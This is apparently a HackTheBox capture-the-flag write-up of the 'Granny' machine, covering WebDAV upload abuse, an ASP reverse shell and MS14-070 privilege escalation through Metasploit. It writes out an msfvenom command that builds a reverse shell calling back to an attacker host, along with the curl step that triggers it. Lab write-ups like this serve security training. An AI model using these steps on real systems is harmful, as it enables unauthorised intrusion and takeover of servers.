HackTheBox: Granny - Writeup
date_range 20/04/2019 06:30 infosorthtblabel
HackTheBox: Granny was another easy machine to get into, Privilege escalation was problematic but it was a good lesson on how to deal with broken exploits.
I first started by doing a port scan of Granny.
Visting the website and running dirb revealed that the website is full of inital configuration files as it appears that the website has not been setup yet or misconfigured. However, the port scan revealed that http webdav methods can used. A good way to test for this is with
After looking around online i found a good sources online to use curl for method requests:
Webdav curl examples link
Firstly a shell needs to be generated to upload to the web server. Since the server is running asp as found in enumeration, an asp shell can be generated through msfvenom.
msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS LPORT=PORT -f asp > rshell.asp
Curl is used for sending the reverse shell as a .txt file. Then the MOVE method is used
to change the file extension to
The shell is initialised with
'curl http://10.10.10.15/rshell.asp' and a shell appears in the
3.1 Post exploitation
whoami /all reveals that i do not have a privileged shell, this will require further post enumeration to
get a privileged shell.
sysinfo shows that the machine is an old version of windows running
Windows server 2003 SP2.
After some research, several local exploits have been found at:
The MS14-070 exploit appeared to be what i was looking for. The exploit was put onto the target machine the same way as the reverse shell. When executing the exploit there was a problem with the exploit not working properly. The process was running but it was stuck.
To solve this, metasploit is used to convert the shell to meterpreter and migrate the process.
Convert shell to meterpreter:
Execute the exploit in metasploit:
session 3 has been opened and when opening it is a privileged meterpreter shell. The root.txt is found in the
desktop of the Administrator account, and success!